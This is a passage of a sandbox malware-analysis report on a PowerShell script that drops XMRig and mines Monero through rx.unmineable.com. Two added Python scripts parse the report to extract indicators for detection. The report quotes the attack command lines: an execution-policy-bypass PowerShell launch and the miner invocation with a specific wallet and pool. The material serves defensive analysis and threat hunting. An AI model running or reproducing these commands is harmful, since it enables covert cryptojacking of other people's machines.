| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.16.208.104.in-addr.arpa | udp |
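The three runs that reached the miner stage (behavioral12, behavioral28 and behavioral1 above) show the same chain: powershell.exe started with -ExecutionPolicy bypass on a script in %TEMP%, a dropped xmrig.exe that requests SeLockMemoryPrivilege, and a TLS connection to the pool named in its -o argument. The Python script below is an added example, not part of the sandbox's own tooling: it parses an excerpt copied from the behavioral1 report (the section names and pipe-table layout are assumed to be exactly as they render here), recovers the pool, algorithm, coin, wallet and worker from the miner's command line, and checks that the pool host actually appears in the Network table. The --url= style command line mentioned in the note after the code is constructed, not taken from the page.

```python
"""Extract and correlate cryptominer IOCs from a sandbox report excerpt.
Added example for this page, not the sandbox vendor's tooling. REPORT is copied
from the behavioral1 run above; the section names and pipe-table layout are
assumed to be exactly as the report renders here."""
import re
import shlex
from urllib.parse import urlsplit

REPORT = r"""Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
"""

SECTION_HEADERS = {"Processes", "Network", "Suspicious use of AdjustPrivilegeToken"}
OPTS = {"-o": "url", "--url": "url", "-a": "algo", "--algo": "algo",
        "-u": "user", "--user": "user", "-p": "pass", "--pass": "pass"}


def split_sections(text):
    """Map each known section header to the non-blank lines under it."""
    sections, current = {}, None
    for line in text.splitlines():
        if line in SECTION_HEADERS:
            current, sections[line] = line, []
        elif current is not None and line.strip():
            sections[current].append(line)
    return sections


def table_rows(lines):
    """Turn '| a | b |' lines into cell lists, dropping the column-header row."""
    rows = [[c.strip() for c in ln.strip().strip("|").split("|")]
            for ln in lines if ln.startswith("|")]
    return rows[1:]


def parse_miner_argv(cmdline):
    """Recover pool/wallet settings from an xmrig-style command line; accepts
    '-o URL', '--url URL' and '--url=URL' (same for -a, -u, -p). None if no pool."""
    # posix=False keeps Windows backslashes literal and quoted paths intact
    argv = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    opts, i = {}, 1
    while i < len(argv):
        key, eq, val = argv[i].partition("=")
        if key in OPTS and eq:                         # --url=URL form
            opts[OPTS[key]] = val
        elif argv[i] in OPTS and i + 1 < len(argv):    # -o URL form
            opts[OPTS[argv[i]]] = argv[i + 1]
            i += 1
        i += 1
    url = opts.get("url", "")
    if not url.startswith("stratum+"):
        return None
    u = urlsplit(url)
    # unmineable-style user is COIN:ADDRESS.worker; other pools use ADDRESS[.worker]
    user = opts.get("user", "")
    coin, _, rest = user.partition(":") if ":" in user else ("", "", user)
    wallet, _, worker = rest.partition(".")
    return {"image": argv[0], "algo": opts.get("algo"), "pool_host": u.hostname,
            "pool_port": u.port, "tls": u.scheme == "stratum+ssl",
            "coin": coin, "wallet": wallet, "worker": worker}


def analyse(report_text):
    """Correlate process, privilege-token and network evidence into findings."""
    sec = split_sections(report_text)
    proc = sec.get("Processes", [])        # alternates image path / command line
    f = {"miner": None, "launcher": None, "lock_memory_priv": [],
         "pool_seen_on_wire": False, "score": 0}
    for cmd in proc[1::2]:
        f["miner"] = parse_miner_argv(cmd) or f["miner"]
        if (re.search(r"powershell.*-ExecutionPolicy\s+bypass\b.*-File\b", cmd, re.I)
                and re.search(r"\\AppData\\Local\\Temp\\", cmd, re.I)):
            f["launcher"] = cmd                 # script run from %TEMP% with policy bypass
    for row in table_rows(sec.get("Suspicious use of AdjustPrivilegeToken", [])):
        if len(row) == 4 and "SeLockMemoryPrivilege" in row[0]:
            f["lock_memory_priv"].append(row[2])   # huge-page setup typical of xmrig
    if f["miner"]:
        host, port = f["miner"]["pool_host"], str(f["miner"]["pool_port"])
        for row in table_rows(sec.get("Network", [])):
            # the report also has rows with no Domain cell; skip those
            if len(row) == 4 and row[2] == host and row[1].endswith(":" + port) and row[3] == "tcp":
                f["pool_seen_on_wire"] = True
    f["score"] = (2 * bool(f["miner"]) + bool(f["launcher"])
                  + bool(f["lock_memory_priv"]) + bool(f["pool_seen_on_wire"]))
    return f
```

analyse(REPORT) returns the findings dict for the excerpt: pool rx.unmineable.com:443 over TLS, algorithm rx, coin XMR, the wallet and worker unmineable_worker_vilqtiac, the PowerShell launcher, xmrig.exe as the holder of SeLockMemoryPrivilege, and pool_seen_on_wire set because the Network table carries a tcp row to that host and port. The parser also accepts xmrig's long options, so a constructed line such as xmrig --algo=rx/0 --url=stratum+tcp://pool.example:3333 --user=WALLET.rig1 yields pool.example:3333 without TLS, an empty coin prefix and worker rig1. The score is a plain weighted count meant only to rank reports; SeLockMemoryPrivilege on its own is not proof of mining, since any software that wants large pages requests it.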
Files
memory/1328-0-0x00007FF939B93000-0x00007FF939B95000-memory.dmp
memory/1328-1-0x0000021647DB0000-0x0000021647DD2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3njdkivh.eec.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1328-11-0x00007FF939B90000-0x00007FF93A651000-memory.dmp
memory/1328-12-0x00007FF939B90000-0x00007FF93A651000-memory.dmp
memory/1328-14-0x00007FF939B90000-0x00007FF93A651000-memory.dmp
memory/1328-15-0x0000021647DE0000-0x0000021647DF2000-memory.dmp
memory/1328-16-0x0000021647D10000-0x0000021647D1A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2076-47-0x0000020D54DF0000-0x0000020D54E10000-memory.dmp
memory/2076-48-0x0000020DE8D60000-0x0000020DE8D80000-memory.dmp
memory/2076-49-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-51-0x0000020DE91A0000-0x0000020DE91C0000-memory.dmp
memory/1328-52-0x00007FF939B93000-0x00007FF939B95000-memory.dmp
memory/2076-50-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/1328-53-0x00007FF939B90000-0x00007FF93A651000-memory.dmp
memory/2076-54-0x0000020DE93D0000-0x0000020DE93F0000-memory.dmp
memory/2076-55-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-57-0x0000020DE91A0000-0x0000020DE91C0000-memory.dmp
memory/2076-56-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-58-0x0000020DE93D0000-0x0000020DE93F0000-memory.dmp
memory/2076-59-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-60-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-61-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-62-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-63-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-64-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-65-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-66-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-67-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-68-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-69-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-70-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-71-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-72-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-73-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-74-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-75-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-76-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-77-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-78-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-79-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-80-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-81-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-82-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-83-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-84-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-85-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-86-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-87-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-88-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-89-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-90-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-91-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-92-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-93-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-94-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-95-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-96-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-97-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-98-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-99-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-100-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-101-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-102-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-103-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-104-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-105-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-106-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-107-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-108-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-109-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-110-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-111-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-112-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-113-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-114-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-115-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-116-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
memory/2076-117-0x00007FF6D13C0000-0x00007FF6D1FF3000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:25
Platform
win11-20240508-en
Max time kernel
1790s
Max time network
1762s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1216 wrote to memory of 4068 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1216 wrote to memory of 4068 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/1216-0-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fhj1x2ab.b55.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1216-9-0x00000212B5FF0000-0x00000212B6012000-memory.dmp
memory/1216-10-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp
memory/1216-11-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp
memory/1216-12-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp
memory/1216-14-0x00000212B64B0000-0x00000212B64C2000-memory.dmp
memory/1216-15-0x00000212B6120000-0x00000212B612A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4068-46-0x000002AFC14B0000-0x000002AFC14D0000-memory.dmp
memory/4068-47-0x000002AFC2FC0000-0x000002AFC2FE0000-memory.dmp
memory/4068-48-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/1216-49-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp
memory/1216-50-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp
memory/4068-53-0x000002AFC3000000-0x000002AFC3020000-memory.dmp
memory/4068-51-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-52-0x000002AFC2FE0000-0x000002AFC3000000-memory.dmp
memory/1216-54-0x00007FFD081D0000-0x00007FFD08C92000-memory.dmp
memory/4068-55-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-56-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-58-0x000002AFC3000000-0x000002AFC3020000-memory.dmp
memory/4068-57-0x000002AFC2FE0000-0x000002AFC3000000-memory.dmp
memory/4068-59-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-60-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-61-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-62-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-63-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-64-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-65-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-66-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-67-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-68-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-69-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-70-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-71-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-72-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-73-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-74-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-75-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-76-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-77-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-78-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-79-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-80-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-81-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-82-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-83-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-84-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-85-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-86-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-87-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-88-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-89-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-90-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-91-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-92-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-93-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-94-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-95-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-96-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-97-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-98-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-99-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-100-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-101-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-102-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-103-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-104-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-105-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-106-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-107-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-108-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-109-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-110-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-111-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-112-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-113-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-114-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-115-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-116-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
memory/4068-117-0x00007FF6C1080000-0x00007FF6C1CB3000-memory.dmp
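The Processes section of this analysis records the whole chain in two command lines: a PowerShell launcher run with `-ExecutionPolicy bypass` against a script in the user's Temp directory, and the dropped `xmrig.exe` pointed at a `stratum+ssl` pool with an Unmineable-style `COIN:ADDRESS.WORKER` user string (the `SeLockMemoryPrivilege` rows above are what XMRig requests when it enables large pages for RandomX). The script below is an added triage example, not code from the sandbox report or from XMRig: it tokenises Windows command lines, pulls the pool host, port, coin, wallet and worker out of the miner arguments, flags the PowerShell launch pattern, and leaves an Edge utility process unflagged. The two miner/launcher lines are copied from the Processes section; the shortened `msedge.exe` line is constructed; the option names are XMRig's own `-a/--algo`, `-o/--url`, `-u/--user`, `-p/--pass`; the function names and the two-finding threshold are this example's conventions.

```python
"""Command-line triage for the process records listed above.

Added example, not code from the sandbox report or from XMRig. The
launcher and miner command lines are copied from the Processes section;
the msedge.exe line is a constructed, shortened benign control. Scoring
and function names are this example's own convention.
"""
import re
from urllib.parse import urlsplit

# Constructed input: the PowerShell launcher and the miner as recorded above,
# plus a shortened Edge utility process that should not be flagged.
SAMPLE_COMMAND_LINES = [
    'powershell.exe -ExecutionPolicy bypass -File '
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\file01 - copia (2).ps1"',
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\xmrig-6.21.3\\xmrig.exe" -a rx '
    '-o stratum+ssl://rx.unmineable.com:443 '
    '-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF'
    '.unmineable_worker_vilqtiac -p x',
    '"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe" '
    '--type=utility --lang=en-US',
]

# XMRig option spellings (short and long) that carry the pool and wallet.
MINER_OPTIONS = {"-a": "algo", "--algo": "algo", "-o": "url", "--url": "url",
                 "-u": "user", "--user": "user", "-p": "pass", "--pass": "pass"}
# Monero standard addresses: 95 base58 characters starting with '4' (heuristic).
XMR_ADDRESS = re.compile(r"^4[1-9A-HJ-NP-Za-km-z]{94}$")
TEMP_DIR = "\\appdata\\local\\temp\\"


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_miner_options(tokens):
    """Collect XMRig-style options, accepting both '-o value' and '--url=value'."""
    opts = {}
    i = 1
    while i < len(tokens):
        name, eq, inline = tokens[i].partition("=")
        key = MINER_OPTIONS.get(name)
        if key and eq:
            opts[key] = inline
        elif key and i + 1 < len(tokens):
            opts[key] = tokens[i + 1]
            i += 1
        i += 1
    return opts


def triage_cmdline(cmdline):
    """Return the indicators an analyst would pull from one command line."""
    tokens = tokenize(cmdline)
    image = tokens[0]
    result = {"image": image, "findings": []}
    lowered = [t.lower() for t in tokens]

    if image.lower().endswith("powershell.exe"):
        for i, tok in enumerate(lowered[:-1]):
            if tok in ("-executionpolicy", "-ep", "-exec") and lowered[i + 1] in ("bypass", "unrestricted"):
                result["findings"].append("execution policy bypass")
            if tok in ("-file", "-f") and TEMP_DIR in lowered[i + 1]:
                result["findings"].append("script run from user Temp")
        return result

    if TEMP_DIR in image.lower():
        result["findings"].append("binary run from user Temp")
    opts = parse_miner_options(tokens)
    if "url" in opts:
        url = urlsplit(opts["url"])  # stratum+ssl://host:port parses as scheme/netloc
        result["pool_host"], result["pool_port"] = url.hostname, url.port
        if url.scheme.startswith("stratum"):
            result["findings"].append("stratum pool URL")
    if "user" in opts:
        coin, sep, rest = opts["user"].partition(":")      # Unmineable: COIN:ADDRESS.WORKER
        address, _, worker = (rest if sep else opts["user"]).partition(".")
        result["coin"] = coin if sep else None
        result["wallet"], result["worker"] = address, worker
        if XMR_ADDRESS.match(address):
            result["findings"].append("Monero wallet in -u")
    if opts.get("algo") == "rx":
        result["findings"].append("RandomX algorithm")
    return result


def triage(cmdlines):
    """Triage every command line; a record with two or more findings is flagged."""
    results = [triage_cmdline(c) for c in cmdlines]
    for r in results:
        r["flagged"] = len(r["findings"]) >= 2
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_COMMAND_LINES):
        print(r)
```

Run over the three sample lines, the launcher is flagged on the execution-policy bypass plus the Temp-directory script, the miner on the Temp-directory image, the stratum URL, the Monero wallet and the RandomX algorithm, and the Edge process is left with no findings. The wallet, worker and pool host are returned as fields so they can be pushed straight into a blocklist or a hunting query.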
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:44
Platform
win11-20240426-en
Max time kernel
1797s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
